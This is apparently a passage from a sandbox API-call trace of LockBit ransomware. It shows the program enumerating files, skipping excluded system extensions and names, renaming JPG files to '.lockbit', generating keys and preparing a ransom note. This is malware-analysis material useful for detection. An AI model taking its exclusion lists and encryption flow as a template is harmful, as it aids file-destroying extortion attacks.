[0147.347] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.347] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.347] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.348] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.348] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.348] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.348] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.348] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.348] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.348] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.348] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.348] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.349] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.349] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.349] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.349] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.349] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.349] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.349] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0175361.JPG") returned 1 [0147.349] lstrcmpiW (lpString1="ntldr", lpString2="J0175361.JPG") returned 1 [0147.349] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0175361.JPG") returned 1 [0147.349] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0175361.JPG") returned -1 [0147.349] lstrcmpiW (lpString1="autorun.inf", lpString2="J0175361.JPG") returned -1 [0147.350] lstrcmpiW (lpString1="thumbs.db", lpString2="J0175361.JPG") returned 1 [0147.350] lstrcmpiW (lpString1="iconcache.db", lpString2="J0175361.JPG") returned -1 [0147.350] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.350] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned=".JPG" [0147.350] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.350] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.350] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.350] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.350] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.351] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.351] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG.lockbit") returned 72 [0147.351] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175361.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0147.352] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.352] malloc (_Size=0x40068) returned 0x3d70450 [0147.352] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=46461) returned 1 [0147.352] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0147.353] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.353] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.353] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0147.353] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.360] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.360] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.360] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.361] free (_Block=0x1fa2ed8) [0147.361] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.361] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.361] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.361] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x38d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0175428.JPG", cAlternateFileName="")) returned 1 [0147.361] lstrcmpiW (lpString1=".", lpString2="J0175428.JPG") returned -1 [0147.361] lstrcmpiW (lpString1="..", lpString2="J0175428.JPG") returned -1 [0147.361] PathFindExtensionW (pszPath="J0175428.JPG") returned=".JPG" [0147.362] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.362] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.362] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.363] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.363] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.364] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.364] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.364] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.364] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.364] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.364] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.364] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0175428.JPG") returned 1 [0147.364] lstrcmpiW (lpString1="ntldr", lpString2="J0175428.JPG") returned 1 [0147.364] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0175428.JPG") returned 1 [0147.364] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0175428.JPG") returned -1 [0147.364] lstrcmpiW (lpString1="autorun.inf", lpString2="J0175428.JPG") returned -1 [0147.364] lstrcmpiW (lpString1="thumbs.db", lpString2="J0175428.JPG") returned 1 [0147.364] lstrcmpiW (lpString1="iconcache.db", lpString2="J0175428.JPG") returned -1 [0147.364] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.364] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned=".JPG" [0147.364] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.364] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.364] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.364] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.364] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.365] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.365] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.366] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.366] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.366] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG.lockbit") returned 72 [0147.366] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0175428.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0147.367] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.367] malloc (_Size=0x40068) returned 0x3e70008 [0147.367] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=14552) returned 1 [0147.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0147.368] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0147.368] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0147.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0147.371] malloc (_Size=0xa6) returned 0x1fa2ed8 [0147.371] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0147.373] free (_Block=0x1fa2ed8) [0147.373] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0147.373] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0147.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0147.373] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5649e8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb12e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0177257.JPG", cAlternateFileName="")) returned 1 [0147.373] lstrcmpiW (lpString1=".", lpString2="J0177257.JPG") returned -1 [0147.373] lstrcmpiW (lpString1="..", lpString2="J0177257.JPG") returned -1 [0147.373] PathFindExtensionW (pszPath="J0177257.JPG") returned=".JPG" [0147.373] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0147.373] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0147.373] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0147.373] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0147.373] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0147.373] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0147.373] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0147.373] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.374] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0147.374] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0147.375] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0147.375] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0147.376] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0177257.JPG") returned 1 [0147.376] lstrcmpiW (lpString1="ntldr", lpString2="J0177257.JPG") returned 1 [0147.376] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0177257.JPG") returned 1 [0147.376] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0177257.JPG") returned -1 [0147.376] lstrcmpiW (lpString1="autorun.inf", lpString2="J0177257.JPG") returned -1 [0147.376] lstrcmpiW (lpString1="thumbs.db", lpString2="J0177257.JPG") returned 1 [0147.376] lstrcmpiW (lpString1="iconcache.db", lpString2="J0177257.JPG") returned -1 [0147.376] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0147.376] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned=".JPG" [0147.376] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0147.376] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0147.376] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0147.376] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0147.377] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0147.377] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0147.377] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0147.377] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0147.377] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0147.377] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0147.377] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG.lockbit") returned 72 [0147.377] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0177257.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0147.382] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0147.382] malloc (_Size=0x40068) returned 0x3df0008 [0147.383] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=45358) returned 1 [0147.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.383] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.383] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0147.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0147.384] ReadFile (in: hFile=0x3cc, 